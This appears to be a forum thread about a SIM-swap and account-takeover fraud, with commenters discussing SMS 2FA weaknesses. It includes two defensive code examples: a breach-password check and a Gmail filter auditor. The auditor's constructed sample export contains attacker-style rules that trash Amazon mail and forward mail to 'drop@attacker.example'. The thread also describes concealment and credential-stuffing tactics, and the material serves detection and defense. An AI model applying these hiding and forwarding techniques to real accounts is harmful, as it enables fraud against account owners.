
I was a victim of this last October and November on a T-Mobile number. This is what occurred:

- My Gmail account was compromised

- My Amazon account was compromised

In Gmail, they added a filter to hide any shipping or customer service messages from Amazon.

In Amazon, every other day, they placed an order for a ~500 USD GoPro device, delivered to an address in NYC. This address changed with every order.

Both passwords to both accounts were kept the same.

After I caught on to the above once I received my credit card statement, in November:

- They attempted to purchase something with my credit card. Security mechanisms triggered, and a verification code was sent to my phone at 4am in the morning. They successfully validated and placed the order. My credit card company assures me they input the right verification code.

- They applied for an Amazon credit card using my identity. It was auto approved, and they used the credit card to purchase ~5k worth of items.

I moved everything off of that T-Mobile number, and switched over to GoogleFi (only to learn GoogleFi uses T-Mobile also... still better than T-Mobile directly I'm hoping).

Edit:

I also wiped my phone, eventually thought that wasn't far enough, and switched to a new device entirely. I'm still unsure how the above occurred, because some of it feels beyond the scope of a SIM-swap.



As an InfoSec professional, what you describe sounds more like a device-level compromise of your iPhone, perhaps through a malicious app, or link you clicked.

What you experienced can't be done with just a SIM swap attack, as you would have lost access to your phone number. And it can't be done with the described T-Mobile hack, as it would have given the hackers silent access to your texts, so they could have reset your Gmail password, but then you would have noticed a password change (and you claim it didn't change).


Read up on credential stuffing; this is increasingly common. With all the recent breaches, there are groups that use old passwords to quickly identify MFA-locked accounts behind re-used passwords. These lists are then sold to people who will, one at a time, pay about 10k for a SIM swap on individually targeted users.

There are lists floating around with 10s of thousands, or hundreds of thousands of users with known passwords in Google, Amazon, Paypal, Coinbase, etc.

Episode 112 of Darknet Diaries (March last year) has a really good breakdown of these markets: https://darknetdiaries.com/episode/112/
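An added example (not from any commenter) of the check a practitioner would run against those breach lists before an attacker does: the k-anonymity range protocol used by Have I Been Pwned's Pwned Passwords service. Only the first five hex characters of the password's SHA-1 leave the machine; the remaining 35 are compared locally against the returned `SUFFIX:COUNT` lines. The range body below is constructed and embedded so the script runs offline; the only genuine value in it is the SHA-1 tail of the string "password". To query the live service, swap `fake_fetch_range` for an HTTP GET of `https://api.pwnedpasswords.com/range/<prefix>`.

```python
"""k-anonymity breach check (Pwned Passwords range protocol). Added example."""
import hashlib
from typing import Callable, Dict, Tuple

# Constructed stand-in for the body returned by
#   GET https://api.pwnedpasswords.com/range/5BAA6
# Real bodies have hundreds of "SUFFIX:COUNT" lines. Every line and count
# here is made up, except that the third suffix is the real SHA-1 tail of
# the string "password".
CONSTRUCTED_RANGES: Dict[str, str] = {
    "5BAA6": "\r\n".join([
        "003D68EB55068C33ACE09247EE4C639306B:3",
        "012C192B2F16F82EA0EB9EF18D9D539B0DD:1",
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493",
        "01330C689E5D64F660D6947A93AD634EF8F:2",
    ]),
}


def fake_fetch_range(prefix: str) -> str:
    """Offline replacement for the HTTP GET. Returns '' for unknown prefixes,
    which the caller treats the same way as a live miss: not found."""
    return CONSTRUCTED_RANGES.get(prefix, "")


def split_digest(password: str) -> Tuple[str, str]:
    """SHA-1 of the password, split into the 5-char prefix that is sent
    and the 35-char suffix that never leaves the machine."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def parse_range(body: str) -> Dict[str, int]:
    """Parse 'SUFFIX:COUNT' lines. Padding entries (count 0, returned when
    the request carries 'Add-Padding: true') parse to 0, i.e. not breached."""
    counts: Dict[str, int] = {}
    for line in body.splitlines():
        line = line.strip()
        suffix, sep, count = line.partition(":")
        if sep:
            counts[suffix.upper()] = int(count)
    return counts


def breach_count(password: str,
                 fetch_range: Callable[[str], str] = fake_fetch_range) -> int:
    """Number of times the password appears in the corpus (0 = not seen)."""
    prefix, suffix = split_digest(password)
    return parse_range(fetch_range(prefix)).get(suffix, 0)


if __name__ == "__main__":
    for pw in ("password", "correct horse battery staple"):
        n = breach_count(pw)
        print("%-30s %s" % (pw, "seen %d times" % n if n else "not in corpus"))
```

Against the live endpoint, send the `Add-Padding: true` header so that the size of the response does not reveal which prefix was queried; the padded lines come back with a count of 0 and the parser above already reads 0 as "not found".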


The parent comment has a point though - after SIM swap attack, all SMS messages would stop arriving at the victim device - unless the attackers swap it back again after every 2FA code. If they had access to a dashboard at t-mobile this might be possible but it sounds like a lot of effort to steal a few thousand dollars.


The victim (ctvo) claims in another comment down the thread that he had a unique Gmail password not re-used on any other service. So I wrote my comment assuming this is true. But, indeed, if his Gmail password was weak and guessable, then the T-Mobile hack would have allowed the hackers to validate MFA and log in.


That assumes their password wasn't already compromised. If they re-used their Gmail password somewhere else, the attacker could have already had their Gmail password and only needed the SIM-swap to verify the login.


Honestly I’m a bit concerned an infosec professional has reached for “iOS device compromise” over a…more common and lower-effort explanation.


The victim (ctvo) claims in another comment down the thread that he had a unique Gmail password not re-used on any other service. I commented assuming this premise is true.


If you believe Apple's marketing that iPhones are unhackable, I have a bridge to sell you.


No need to be aggro about it. No one’s suggesting iPhones are unhackable, just that realistically utilizing an iOS or Android exploit like that is a bit much for something simple like credit card fraud. Those exploits are valuable.


Why would someone burn a device level exploit for $5k when you could sell the exploit for 10x or even 100x more?

Sounds like an easy way to burn your exploit after using it a few times to get electronics off Amazon.


What makes you think this was used for only $5k? In these cases, hackers usually target many victims, not just one.


Would you cite the marketing to which you referred? I’ve never seen it.


Do share the explanation with us if you would kindly so please.


There must be something especially lucrative about GoPros as stolen devices.

I’ve heard multiple independent stories from a few friends in Law Enforcement about cases involving trafficking of large quantities of stolen GoPros (obtained via methods not unlike what happened to you).

Interesting you mention NYC - at least one of these cases involved a very high volume fencing syndicate operating as a legitimate storefront in NYC - with merchandise fraudulently obtained from Amazon[0]. A friend of mine worked this case.

Small, fairly high value, high demand, and no remote shutdown/disable/reporting - somewhat of a perfect storm I suppose.

[0] - https://www.cnbc.com/amp/2018/06/07/how-the-finans-stole-1-p...


If you go on ebay, you can find tons of shady gopro listings.

They'll have all the original packaging and put it up as a "pre-owned" unit, but then you open the listing and they have 20 of them for sale.

We also had a local hotel/waterpark that was running a burglary/fencing operation in the mid aughts. The room cleaners would look for gopros, iphones and other electronics. If they found anything, they'd take it and hand it over to the two managers, who then fenced it out to local guys who'd either pawn them or sell it on Craigslist and they'd split the money.

Customers routinely complained to the managers who were the fences so they'd tell the customer they'd fill out a complaint form and send in a police report to the local PD. Obviously, that never happened. This went on for about two years until people on social media and review sites like Yelp started discovering what was happening was not an accident. They finally busted the ring and within a few weeks, the waterpark and hotel were shut down for various other repeated OSHA and other infractions that went unfixed. The local paper reported even though they busted the ring, the money and the goods were long gone, leaving the victims with little recourse.


It sounds like an example where review sites help warn others where management and the local police do nothing.

If you're the victim of a crime, you should do the police report yourself - also for things like insurance claims.


> In Gmail, they added a filter to hide any shipping or customer service messages from Amazon.

I gotta admit, that's pretty clever. Crude, but effective.


To be honest, there is already zero way to distinguish between shipping and customer service messages from Amazon. If you order any appreciable amount of items you would have no idea they sent you any message.

Of course I only found this out after being burned by it. Turns out they’d sent me a message telling me the item I returned was not in the same condition it was sent in (it was), but the message was utterly lost in the flood of ‘order received/sent/delivered’ mails they send (with the same subject).


I was about to comment the same thing. It's very simple, but I don't think I would have thought of it.


It's quite common, in fact my "go-to" hacked account rule in Office 365 is "alert me, system admin, anytime anyone creates an outlook/exchange rule".

Our group is small enough that I get very few alerts at all, and I've caught two compromises that way.
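The filter described at the top of the thread (hide everything from Amazon) and the Exchange inbox-rule alert above are the same detection problem on two mail systems. As an added example, not code from any commenter, here is a small auditor for Gmail's own filter export (Settings > Filters and Blocked Addresses > Export, an Atom feed whose criteria and actions are `apps:property` elements). It flags filters that forward, trash or hide mail, and notes when such a filter targets order, shipping or security mail. The export below is constructed for the example; the property names are the ones Gmail's export uses for these actions, while the term list and severity thresholds are this example's own choices.

```python
"""Audit a Gmail filter export for filters that hide, trash or forward mail.
Added example; the export below is constructed."""
import xml.etree.ElementTree as ET
from typing import Dict, List

ATOM = "{http://www.w3.org/2005/Atom}"
APPS = "{http://schemas.google.com/apps/2006}"

# Constructed export. Filters 1 and 2 are ordinary; 3 is the attacker filter
# from the thread (Amazon mail archived, marked read and trashed); 4 quietly
# forwards the account's mail to an outside address.
SAMPLE_EXPORT = """<?xml version='1.0' encoding='UTF-8'?>
<feed xmlns='http://www.w3.org/2005/Atom'
      xmlns:apps='http://schemas.google.com/apps/2006'>
  <title>Mail Filters</title>
  <entry>
    <category term='filter'/>
    <title>Mail Filter</title>
    <apps:property name='from' value='newsletter@example.com'/>
    <apps:property name='label' value='Newsletters'/>
  </entry>
  <entry>
    <category term='filter'/>
    <title>Mail Filter</title>
    <apps:property name='hasTheWord' value='list:dev.example.com'/>
    <apps:property name='shouldArchive' value='true'/>
    <apps:property name='label' value='dev-list'/>
  </entry>
  <entry>
    <category term='filter'/>
    <title>Mail Filter</title>
    <apps:property name='from' value='amazon.com'/>
    <apps:property name='shouldArchive' value='true'/>
    <apps:property name='shouldMarkAsRead' value='true'/>
    <apps:property name='shouldTrash' value='true'/>
  </entry>
  <entry>
    <category term='filter'/>
    <title>Mail Filter</title>
    <apps:property name='to' value='me@example.com'/>
    <apps:property name='forwardTo' value='drop@attacker.example'/>
  </entry>
</feed>
"""

CRITERIA = ("from", "to", "subject", "hasTheWord", "doesNotHaveTheWord")
# Terms an account thief wants hidden: purchases, shipping, logins, resets.
SENSITIVE_TERMS = ("amazon", "order", "ship", "deliver", "verif", "security",
                   "password", "sign-in", "invoice", "paypal", "bank")
RANK = {"ok": 0, "medium": 1, "high": 2}


def parse_filters(xml_text: str) -> List[Dict[str, str]]:
    """One dict of property name -> value per <entry>."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    return [{p.get("name"): p.get("value", "") for p in entry.iter(APPS + "property")}
            for entry in root.iter(ATOM + "entry")]


def assess(props: Dict[str, str]) -> Dict[str, object]:
    severity = "ok"
    reasons: List[str] = []

    def raise_to(level: str, why: str) -> None:
        nonlocal severity
        reasons.append(why)
        if RANK[level] > RANK[severity]:
            severity = level

    forwards = "forwardTo" in props
    trashes = props.get("shouldTrash") == "true"
    hides = props.get("shouldArchive") == "true" or props.get("shouldMarkAsRead") == "true"
    if forwards:
        raise_to("high", "forwards matching mail to " + props["forwardTo"])
    if trashes:
        raise_to("high", "sends matching mail straight to Trash")
    if hides and "label" not in props:
        raise_to("medium", "skips the inbox or marks read without applying a label")
    if forwards or trashes or hides:
        criteria_text = " ".join(props.get(k, "") for k in CRITERIA).lower()
        hits = [t for t in SENSITIVE_TERMS if t in criteria_text]
        if hits:
            raise_to("medium", "targets sensitive mail (%s)" % ", ".join(hits))
    return {"criteria": {k: props[k] for k in CRITERIA if k in props},
            "severity": severity, "reasons": reasons}


def audit_filters(xml_text: str) -> List[Dict[str, object]]:
    return [assess(p) for p in parse_filters(xml_text)]


if __name__ == "__main__":
    for i, f in enumerate(audit_filters(SAMPLE_EXPORT), 1):
        print("filter %d [%s] %s" % (i, f["severity"], f["criteria"]))
        for r in f["reasons"]:
            print("    -", r)
```

Run it against your own export after any suspected compromise, and keep a copy of a known-good export so that a diff shows filters you did not create.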


Thanks for the tip. That's a pretty good one; I wouldn't have thought of it.


Do you know if those alerts can also be set up on Google Admin?


Another common technique is a filter to forward all mail. Hard to notice. I ought to go check right now...


I think Gmail has a big yellow notice in your account for 7 days after a new forwarding e-mail address is added. That of course falls apart when you use an external client, but there’s that.


They were able to reset your Google password using only the simjacked phone? Or was the password the same as the T-mobile one as well?

It’s hardly a second factor if it can be used to entirely replace the primary one.


Google still allows you to set up recovery phone numbers, unfortunately.

https://support.google.com/accounts/answer/183723?hl=en&co=G...

I think years ago I found my number there with no recollection of ever agreeing to it and quickly yeeted it. (You can remove the number but keep the recovery email.)


It's subtle with the UI but you can choose not to allow SMS by removing your phone number from Google after setting up alternative 2FA. If they don't have a number they can't sim-jack


This is one of the most important pieces of security advice that is often overlooked: remove your phone number from EVERYTHING.

You can also enable Advanced Protection[1] for your Google account, but other repeat offenders like Github will continue to allow SMS fallback to bypass 2FA if you have a phone number listed anywhere.

1. https://landing.google.com/advancedprotection/


Big benefit of Advanced Protection: you can go tell less technical users to set it up and it will enforce all these best practices (no SMS, two keys, no giving random apps access to GMail...).


I use Google Voice for everything... except my bank, because they said using T-Mobile is so much safer than Google, so I had to switch back.


The prohibition against using a VoIP number for banking purposes is stupid. They already have the full battery of KYC info on me: if I want to use a VoIP number for 2FA (because they are so behind the times they don't support FIDO or even TOTP) then unless law says they cannot they need to allow it.

And while on the topic of banks, most will suspend access to your online portal if you log in with a VPN. Give me a bank that allows VoIP phone numbers, VPN access, and TOTP and/or FIDO support for 2FA and I'll ditch Schwab right now.


Both Fidelity and Schwab allow non-SMS 2FA.

They both use Symantec VIP but it’s fairly easy (for developers at least) to export those tokens and import them into something like Authy, Google Authenticator etc.

https://ketanvijayvargiya.com/257-symantec-vip-authy/


My bank used to allow email 2fa or SMS, but they recently dropped support for email. I don’t love using email for 2fa but since my email is itself protected with non-SMS 2fa I thought it was the best of the two bad options. Now I’m sad. Ideally my bank would support the FIDO standard and I would use a compatible hardware token.


In the case of Schwab it's only with their app. If I wanted a geolocation leash up my ass I wouldn't be complaining about this: if they don't trust me as a customer then screw them, I'll find a bank who does. Schwab's notion of non-SMS 2FA is their app. I want to use my laptop on a VPN using a FIDO key or TOTP and Schwab doesn't support this.


Do you happen to know if they allow you to also totally disable SMS 2FA?

I know that Vanguard, for instance, supports non-SMS 2FA but doesn't let you disable SMS as a fallback (and I'd rather not just totally remove all phone numbers, but maybe I have to...).


I believe you can remove SMS fallback now on Vanguard.


Neat, thank you! I'll give it a try.


Yeah, in Fidelity SMS 2FA is disabled for me. Fall back is to call them to get into my account. Don’t know about Schwab.


I had their non-SMS Symantec 2FA set up a couple years back, but turned it off cause I couldn't figure out how to disable the SMS fallback. Every time I got a new device and wanted to set up the Symantec TOTP generator they would just send me a SMS for validation. So I just told them to turn off the Symantec part.

Maybe they've changed their policy since then. But when you call to get set up on a new device, how do they verify your identity now if you don't have SMS fallback?


Chase won't let you use voip for 2fa. Ameritrade works.


I have Ally and Chime and I’m extremely disappointed neither accepts a Yubikey or something. Older banks like Schwab or US Bank I could see being behind the times, but I’d expect fintech or something more modern to be more sensible.


I used to as well, but lots of places have stopped accepting VoIP numbers now. A bunch of them actually just silently fail to send messages, so you can be clicking SMS password reset and get nothing in your texts.


Ally forced me recently to get rid of the Google Voice (GV) number and email for two-factor and use a 'real' mobile number. It is pretty awful how they offer no other two-factor mechanism except a non-GV mobile number.


Something doesn't add up here because last I checked Amazon made you put the credit card number in again if you want to ship to a new address. Just breaking in to your amazon account wouldn't be sufficient to ship stuff to random addresses using your credit card.


> Something doesn't add up here because last I checked Amazon made you put the credit card number in again if you want to ship to a new address.

Not always.


Interesting... I had something similar happen to me, with minimal outward, acute damage (e.g., running up bills on random credit cards). It is reasonable to assume my entire identity is compromised. Sorry this happened.

How do you know T-Mobile was the entry point, and not say, Google (e.g., Google Chrome, Google Ads)? What type of phone did you have (e.g., Android or iPhone)? What is your browser and Search Engine on your smartphone?

Thanks!


I assumed it was T-Mobile after I wiped the phone and had the follow-up incident where a verification code via SMS was successfully verified.

I used an iPhone, Safari mobile, Google search engine.


There's also this giant vulnerability with Apple Webkit, across all devices, that was patched 13 February 2022: https://9to5mac.com/2023/02/13/macos-13-2-1-webkit-security-....


SMS is unencrypted, and Google SE has been compromised for much if not all of 2022. From what I can tell the issue persists. I officially reported it in December, and again in January, and again in February. Pretty wild, TBH. Think about the number of services that have Google SE and Ads integration. Makes me nauseous.

Did you happen to report to Apple and Google (for documentation)?


In what way is the google search engine compromised?


Ways which I shared with Google, because it's a very serious privacy and security vulnerability.

We need more robust security integration to catch things before they are pushed to results. I understand latency will increase, and some ads revenue will decrease. But like, isn't it also cool to have a customer base that is better protected against egregious attacks, attacks that could be prevented? IMO, yes. It's called "stewardship."


No 2FA on your GMail?

Any idea how G and A were compromised, password reuse?


Probably SMS as a 2FA option on Gmail, which is the real problem. Once you add your Yubikey and set up TOTP as a backup, you need to go back and delete SMS as a 2FA option. Had Gmail been configured correctly, the SIM swap would have been far less serious.


SMS 2FA is a security risk!

I used to work tech support for cell phone providers, and while we were trained about fraud, the nature of the industry (low wages, high turnover) makes this a security flaw that financial institutions should not risk.


How is SMS a security risk? As far as I know, SMS is closely tied to a person's identity, especially 'know your customer' regulations. I'm curious how it's a security risk; as far as I know they have to be unique, which is good



Wait. Isn't it painfully obvious when you've been simjacked? If your phone suddenly loses signal and refuses to register with the network, you know something is up. You may think it was a malfunction of your phone or your network, but it's pretty much a definition of a modern-day "drop everything you're doing and deal with it" emergency. You can't not be aware of it, or be unsure if it happened to you.


You very much cannot be aware of it. Consider what happens when you're SIM-swapped at 2 am. Are you going to notice that? Probably not. And maybe not after you get up and check your phone. Because your phone may be connected to the internet via your home wifi, and you don't even notice your phone has no bars and no service because you're still able to browse the web and check email.


So maybe the attackers just wait for the right moment to strike. Like say Feb 13th. https://www.reuters.com/business/media-telecom/t-mobile-down...

But if the attacker already has your info, then couldn't they just add another line to your mobile plan, so your handset continues working, just with a new, unbeknownst to you, phone number? That way it wouldn't be noticeable on the handset.

The real question is how long do you think it would take you to break into your own Gmail account after the password's been changed and the attached phone number's also been changed?

Probably longer than it would take an attacker to drain bank accounts, I figure.


By the time you notice and can react it's too late. There have also been many prominent examples of people who got their cryptocurrency exchange accounts broken into with SIM hijacking which was conducted while the victim was asleep.


The phone may not lose signal immediately (or at all) - this is implementation dependent, so it's not a reliable indicator.



Do you live in the US? You don't need an ID to get a phone number here so SMS is not necessarily tied to your identity and it has nothing to do with KYC.

Moreover, you don't want it to be tied to your identity. The fact that anyone can pretend to be you and hijack your phone number is exactly what makes it insecure.


Anyone can walk into a T-Mobile store with a fake driving license with your name on it and claim they need help moving their phone number to their new phone. This is of course your number. They will then receive all of your SMS messages.

Or, you know, they can just bribe the store employees. Has happened before, still happens, will keep happening as long as a phone number is considered important for anything at all.


No the other problem is Google allows adding recovery phone numbers that bypass 2FA :D

https://support.google.com/accounts/answer/183723?hl=en


I can use my phone number for 2FA and/or as a recovery phone number. Would you advise to remove it from both places or just from 2FA?


Remove it from both. However, make sure that you have quite a lot of backups of your 2FA backup keys, and maybe even one offline backup of your seed. If you lose them, the account is gone (which is a good thing, I guess).


Thanks. I have Google backup codes as well as multiple Authy installations, Google prompt and a recovery email address so I guess I should be covered :)


What is "Google prompt" here?


It’s a notification pop-up the Google mobile app can send, asking for login confirmation.


I see, but doesn't it have the same issue as sending an SMS to the phone if the phone has been stolen, in that the thief can just say "yes" to the prompt?


No, it's not quite the same issue. SIM swap works remotely without anyone getting a hold of my phone.

A stolen phone can of course be a problem as well, but at least it's somewhat under my control and I may notice pretty quickly when it's gone.


2FA on everything. No password reused. Only similarity is both had the T-Mobile number attached to them.

I initially thought only Amazon was compromised. I thought it was due to us throwing away a FireTV device (assumption: we didn't log out and de-register) that was then used to order items.

And then I found they added filters to my Gmail account to hide the Amazon orders, and went into full panic mode.


So both were compromised through TMobile sim swap, which was the backup for not having access to your 2FA?

I wonder then what the point is of having 2FA at all if you can just click a few buttons to bypass them with an SMS.

Were you specifically targeted in any way that would make the attackers go find your phone number and perform the swap?


Wouldn’t this still mean they cracked your gmail password? Or am I not understanding how this was executed?


Interesting. Was your 2FA set up to use Google Authenticator or regular SMS? It's been a while since I used Google services, but from what I recall from a previous company where we used Gmail, the only way to do 2FA with Google Authenticator if you lost access to the phone was with a backup code you are given at 2FA setup time. Is that no longer the case?


2FA with authenticator. As someone correctly points out, Google appears to keep SMS as a recovery option unless you specifically opt out?

Edit: I can't actually find a help article, but it's under "Try another way to sign-in" and they'll text you a verification code to your registered account phone number.


Just noticed Authy’s answer to the FAQ of “Is the Authy App Susceptible to a SIM Swap?” does not have the word “No” in it.

Does anyone know if Authy uses SMS for any kind of recovery? I don’t see an option in the security settings

https://support.authy.com/hc/en-us/articles/360012427914-Is-...


SMS is just used to sign in. Everything is encrypted, and you can't access any data without a password. If you don't have the password, you don't get the data. There is no recovery.


Your OTP secrets should be e2e encrypted if you set up a backup passphrase. Worst case: someone can download your encrypted seeds.

I’ll agree though that Authy’s docs are really ambiguous about account recovery.


This is why you don’t use SMS as 2FA. And use iOS. Were you using Android?


Or GrapheneOS. Or just stop visiting sketchy sites and running sketchy applications. That will eliminate 98% of your problems.


Scary, this just convinced me to turn off text-based 2FA and only have Google Auth App (+ backup keys). Thank you.


Another different failure point. I once broke my android phone and bought and set up a new one - only to find I can no longer access my Gmail account that I used before with my Google authenticator, so I am locked out forever from that account. I had a backup but was not able to find it. Despite knowing hundreds of contact emails (all backed up in thunderbird), account history, password history, etc - for years I have not been able to get back in.


> I had a backup but was not able to find it.

So you didn't have one lol. I understand that's an extremely frustrating situation though. Part of making backups is testing them once in a while (at least making sure they exist). Something else you could've done previously was to use Authy or Aegis, which help you back up the seeds themselves encrypted under a passphrase, so you can recover the accounts even if you lose everything else. Although of course, all of this depends on your threat model; if you don't care about SIM swaps, or if losing the account is still much more worrying, then I guess it's just an unnecessary hassle/risk.


With Authy I can enter a backup password and download everything to a new phone. I suppose that's a different failure point but still possibly worth the trade-off? Yubikey is the next level up.


So if you didn't have a credit card, nothing would have happened? Why do people still use credit cards if they are so fucking leaky and easy to exploit?


Google Fi just uses their towers. Your telecom data isn’t communicated with T-Mobile, just the data of whatever you’re using (calls, Netflix, browsing porn).


Recently Googlefi also reported that as a result of a likely T-Mobile related breach, they also lost data including sim numbers: https://www.reddit.com/r/GoogleFi/comments/10pjtie/google_fi... .


I no longer have SMS enabled as a MFA for this exact reason on services. Only physical or digital authenticator where necessary.




> BTW - give me some of that big-swinging-credit-balls you seem to gotts...

15 * 500 = 7,500 USD. Having a steady job should put that within reach.




> Why is that controversial?

I don't know if it's controversial, but I think for most people, keeping up with your current card statement isn't something you do daily. Sometimes companies have a way to notify you of new charges immediately, sometimes not. Being surprised at the end of the month is more common than you'd think.


How would you know unless you check your credit card statement every day?


FWIW, some banks will let you set up email alerts for when your CC is used, or used over a certain threshold.


I have mine set up to send me a text message for every transaction. However, I suppose I might stop getting the texts if my number was compromised.


I for one don't really look at any banking stuff these days. I just live well within my means. If you have a generally healthy financial situation there is no need to constantly check.


He noticed the first time he got a bill at the end of the month, it doesn't seem that difficult to understand.


Putting the "15" in italics isn't doing yourself any favors when asking aita


If this scammer thought they were a high value target, I imagine they would have gone bigger than buying $500 GoPros.


Not always.

It will be easier to go after high income middle class types than HVTs, who will likely have someone watching things closer than busy working folk.

If you hit a target for multiple low-value charges you face less scrutiny than with large transactions. Fraud should pick up multiple purchases of the same product to different addresses though.



